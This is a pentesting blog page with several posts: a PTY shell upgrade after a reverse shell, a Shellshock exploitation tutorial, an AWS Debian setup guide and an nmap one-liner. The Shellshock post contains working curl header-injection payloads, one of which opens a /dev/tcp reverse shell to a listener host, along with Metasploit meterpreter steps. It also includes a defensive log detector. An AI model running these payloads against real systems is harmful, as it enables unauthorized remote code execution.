GetCyber

Dan & Tamara

  • ALL
  • KALI
  • DEBIAN
  • WEB
  • MORE
    • MACOS
    • WINDOWS
    • QUICK HACKS
    • BLOGS
  • 📺 YOUTUBE VIDEOS
  • 🤓 ABOUT
    • 🗓️ EVENTS
    • 📩 CONTACT

- Live Fri & Sat on YouTube!

Recent Posts

  • Manipulating and Filtering Content in LinuxMarch 2, 2023
  • Appointment – Starting Point – Hack The Box // Walkthrough & SolutionFebruary 28, 2023
  • Sequel – Starting Point – Hack The Box // Walkthrough & SolutionFebruary 28, 2023
  • Crocodile – Starting Point – Hack The Box // Walkthrough & SolutionFebruary 28, 2023
  • Exposed: The Insidious Linux Backdoors You Never Knew ExistedFebruary 25, 2023
NEWSLETTER SIGN UP!

Recent Comments

  1. Benimaru on PIECE of cake – Install Metasploitable 2 on VirtualBoxJune 3, 2023

    Metasploitable.vmdk file is not listing in the storage tab. There is only one parent tab called "Controller:SATA" inside which two…

  2. Lauren Jones on Installing Kali Linux on Android using NetHunter and TermuxMay 26, 2023

    You're getting a "Permission denied" error because you're trying to execute a file that does not have execution permissions. The…

  3. Shadow on Installing Kali Linux on Android using NetHunter and TermuxMay 21, 2023

    Hello. I found Dan (the man) Duran while having an issue with kali on bare metal having a connectivity issue.…

  4. Shadow on Installing Kali Linux on Android using NetHunter and TermuxMay 21, 2023

    Hello. I found Dan (the man) Duran while having an issue with kali on bare metal having a connectivity issue.…

  5. Muhammad Asif on Why is my Kali Linux not connecting to Wi-Fi? 😱 // 100% Problem FIXED!May 6, 2023

    Hey Mate. I am a bigger in Kali Linix console. I am using MacBook pro. Downloaded and running fine via…

Archives

  • March 2023
  • February 2023
  • January 2023
  • December 2022
  • November 2022
  • October 2022
  • August 2022
  • June 2022
  • April 2022
  • March 2022
  • November 2021
  • October 2021

Category: FEATURED

How to fix “su : must be run from a terminal”?

Posted on February 3, 2023 - February 3, 2023 by Dan Duran

I recently pwned a web server on a pentest I was doing. I was able to upload and execute a PHP reverse shell script that gave me a shell. The issue was that it would run as the www-data user, and when I tried to su to root, I got the following error:

“su : must be run from a terminal”

How do you fix that? No worries, here’s a solution using Python. Simply execute the following command from your shell if you have Python installed:


echo "import pty; pty.spawn('/bin/bash')" > /tmp/qwerty.py

After you do that, run the script:


python /tmp/qwerty.py

Basically, what you are doing here is writing a one-line Python script to the /tmp folder that uses pty.spawn to start /bin/bash attached to a pseudo-terminal. Run the script with python and voila: su now sees a terminal and no longer refuses to run.

I hope this helps. Cheers!

Dan D.

 

Posted in DEBIAN LINUX, FEATURED, KALI LINUX, KNOWLEDGE BASE, QUICK HACKS

Exploiting the Shellshock Vulnerability with Kali

Posted on January 23, 2023 - January 23, 2023 by Dan Duran

Shellshock, a vulnerability that enables attackers to remotely execute arbitrary code through the Unix Bash shell, was one of the most serious flaws discovered in the past decade.

Shellshock remains a serious hazard, particularly for unpatched systems. It affects the majority of Linux and UNIX-based operating systems. The vulnerability now appears in many CTF challenges, so this article might assist you in finding a technique to attack it.

What is the Mechanism of this Vulnerability?

It is a security flaw in the Unix Bash shell that causes Bash to unintentionally execute commands from environment variables. The flaw is caused by Bash erroneously executing trailing commands when importing a function definition contained in an environment variable. If an attacker can modify the environment variable list, he or she may run arbitrary commands on the system or exploit other flaws in Bash’s command interpreter.

To test the vulnerability, we make a curl request to the target system and verify that the response contains the “id” output of the current user.


root@kali:~# curl -A "() { ignored; }; echo Content-Type: text/plain ; echo  ; echo ; /usr/bin/id" http://192.168.175.10/cgi-bin/cgi-file.cgi

uid=33(www-data) gid=33(www-data) groups=33(www-data)

This trick works! We were successful in changing the environment variable and running the “id” command. We can open a reverse shell using the same method.


root@kali:~# curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/192.168.175.20/9000 0>&1' http://192.168.175.10/cgi-bin/cgi-file.cgi

Of course, you need a listener on the chosen port, in this case 9000.


nc -lvnp 9000

On the remote system, the User-Agent value sent by curl is saved as an environment variable. When using curl, this is set to HTTP_USER_AGENT=curl/7.47.0 by default. This value, however, can be changed, and that is how the environment variable comes to contain malicious code that creates a reverse shell.
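Because the request has to carry a Bash function definition ("() {") in a header, the attempt is visible in the web server's access log. The following is an added example, not code from the original post: a small Python detector for Apache combined-format logs. The log lines are constructed for illustration and reuse the lab addresses and CGI path from the commands above.

```python
import re

# Apache "combined" format:
# host ident user [time] "request" status bytes "referer" "user-agent"
QUOTED = r'"((?:[^"\\]|\\.)*)"'
LOG_RE = re.compile(
    r'(\S+) \S+ \S+ \[([^\]]+)\] ' + QUOTED + r' (\d{3}) \S+ ' + QUOTED + ' ' + QUOTED
)
# An exported Bash function definition starts with "() {"; the spacing
# between the tokens varies, so match it loosely.
FUNC_DEF_RE = re.compile(r'\(\s*\)\s*\{')

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '192.168.175.20 - - [23/Jan/2023:10:15:02 +0000] "GET /cgi-bin/cgi-file.cgi HTTP/1.1" '
    '200 54 "-" "() { ignored; }; echo Content-Type: text/plain ; echo ; /usr/bin/id"',
    '192.168.175.21 - - [23/Jan/2023:10:15:09 +0000] "GET /index.html HTTP/1.1" '
    '200 1024 "-" "curl/7.47.0"',
    '192.168.175.20 - - [23/Jan/2023:10:16:40 +0000] "GET /cgi-bin/cgi-file.cgi HTTP/1.1" '
    '500 0 "() { :;}; /bin/true" "Mozilla/5.0"',
    '192.168.175.22 - - [23/Jan/2023:10:17:00 +0000] "GET /docs/func() HTTP/1.1" '
    '404 0 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
]

def find_shellshock_attempts(lines):
    """Return one finding per log line whose request line, Referer or
    User-Agent contains a Bash function definition."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format; skip rather than guess
        host, when, request, status, referer, agent = m.groups()
        fields = {"request": request, "referer": referer, "agent": agent}
        for name, value in fields.items():
            if FUNC_DEF_RE.search(value):
                hits.append({"host": host, "time": when, "field": name,
                             "request": request, "status": int(status)})
                break
    return hits

if __name__ == "__main__":
    for hit in find_shellshock_attempts(SAMPLE_LOG):
        print(hit)
```

A hit against a /cgi-bin/ path that returned 200 deserves attention first, since that combination is what a successful test like the one above leaves behind.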

Metasploit-based exploitation

Metasploit can be used to accomplish the same aim. Using the search function, we can quickly find exploits. The search returns numerous results; the one we want is the Apache mod_cgi exploit. Here are the Metasploit commands:

msf6 > search shellshock
msf6 > use exploit/multi/http/apache_mod_cgi_bash_env_exec
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > show options
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set RHOST 192.168.175.10
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set TARGETURI /cgi-bin/shellshock.cgi
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > run

 

Posted in FEATURED, KALI LINUX, KNOWLEDGE BASE, QUICK HACKS

Installing Debian 11 on Amazon Web Services

Posted on January 20, 2023 - January 22, 2023 by Dan Duran

To install Debian 11 on Amazon Web Services (AWS), you can use the AWS Elastic Compute Cloud (EC2) service. Here are the general steps you can follow:

Register on AWS https://portal.aws.amazon.com/billing/signup

Log in to your AWS account and navigate to the EC2 dashboard.

Click on the “Launch Instance” button to start creating a new virtual machine.

Name your instance and type “Debian 11” in the search bar. In the “Choose an Amazon Machine Image (AMI)” section, select the Debian 11 AMI x86.

Choose the type of instance you want to launch, and configure the settings as desired (such as the number of vCPUs and amount of memory). In this case, the free tier.

In the “Key pair (Login)” section, create a new “key pair.”

Name the key pair, select RSA and .pem.

The key pair .pem file will be downloaded. Make sure you keep this .pem secure and DO NOT LOSE IT!

Now, in Network Settings, create a new security group and allow SSH traffic only to “My IP”.

Configure Storage to 8GB gp2.

Click on the “Launch” button to launch the instance.

You may also want to open ports 80 (http) and 443 (https) only for your IP while you are building your stack. For that, click on “View all Instances,” select your instance and click on Security > Security Groups.

Click on your security group (ex: sg-05d7…).

Click on “edit inbound rules” and add HTTP > My IP and HTTPS > My IP. Save rules.
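To confirm that the inbound rules really are limited to your own address, you can audit the security group's exported rules. The following is an added example, not part of the original post: it reads JSON in the shape returned by `aws ec2 describe-security-groups` and reports any rule that exposes port 22, 80 or 443 to something other than your IP. The group ID `sg-EXAMPLE`, the address 203.0.113.7 and the sample rules are constructed placeholders.

```python
import ipaddress
import json

WATCHED_PORTS = {22, 80, 443}  # the ports opened in the steps above

# Constructed sample in the shape of `aws ec2 describe-security-groups` output.
SAMPLE_JSON = json.dumps({"SecurityGroups": [{
    "GroupId": "sg-EXAMPLE",
    "IpPermissions": [
        {"IpProtocol": "tcp", "FromPort": 22, "ToPort": 22,
         "IpRanges": [{"CidrIp": "203.0.113.7/32"}], "Ipv6Ranges": []},
        {"IpProtocol": "tcp", "FromPort": 80, "ToPort": 80,
         "IpRanges": [{"CidrIp": "0.0.0.0/0"}], "Ipv6Ranges": []},
        {"IpProtocol": "tcp", "FromPort": 443, "ToPort": 443,
         "IpRanges": [{"CidrIp": "203.0.113.7/32"}],
         "Ipv6Ranges": [{"CidrIpv6": "::/0"}]},
    ],
}]})

def audit_ingress(sg_json, my_ip):
    """Return (group_id, port, cidr) for every watched port that is
    reachable from a source other than my_ip/32."""
    allowed = ipaddress.ip_network(f"{my_ip}/32")
    findings = []
    for group in json.loads(sg_json)["SecurityGroups"]:
        for perm in group.get("IpPermissions", []):
            proto = perm["IpProtocol"]
            if proto == "-1":            # "-1" means all protocols and ports
                ports = WATCHED_PORTS
            elif proto == "tcp":
                lo, hi = perm["FromPort"], perm["ToPort"]
                ports = {p for p in WATCHED_PORTS if lo <= p <= hi}
            else:
                continue                 # udp/icmp rules are out of scope here
            cidrs = [r["CidrIp"] for r in perm.get("IpRanges", [])]
            cidrs += [r["CidrIpv6"] for r in perm.get("Ipv6Ranges", [])]
            for cidr in cidrs:
                if ipaddress.ip_network(cidr, strict=False) != allowed:
                    findings.extend((group["GroupId"], p, cidr)
                                    for p in sorted(ports))
    return findings

if __name__ == "__main__":
    for finding in audit_ingress(SAMPLE_JSON, "203.0.113.7"):
        print("too broad:", finding)
```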

Once you have connected to your instance, you can start customizing it and installing any additional software you need.

Note: Make sure you are aware of the costs of running an instance on AWS, and shut down or terminate instances that you are no longer using to avoid unnecessary charges.

In the next post, I will show you how to connect to your instance using the private key file and the IP address or hostname of the instance using ssh.

Cheers!

 

Dan D.

Posted in DEBIAN LINUX, FEATURED, KNOWLEDGE BASE, WEB DEV

Nmap Cheat Sheet for outputting IPs in a simple list

Posted on March 23, 2022 - January 23, 2023 by Dan Duran

Output only the IP addresses on the terminal with nmap

You know how to use nmap to find the list of IP addresses that are currently up on the network. But the output can be messy.

This cheat gives you a simple list of IP addresses on the terminal, so you can cut and use them as you please:


nmap -sP 192.168.1.0/24 | awk '/is up/ {print up}; {gsub (/\(|\)/,""); up = $NF}'

Posted in FEATURED, KALI LINUX, KNOWLEDGE BASE, QUICK HACKS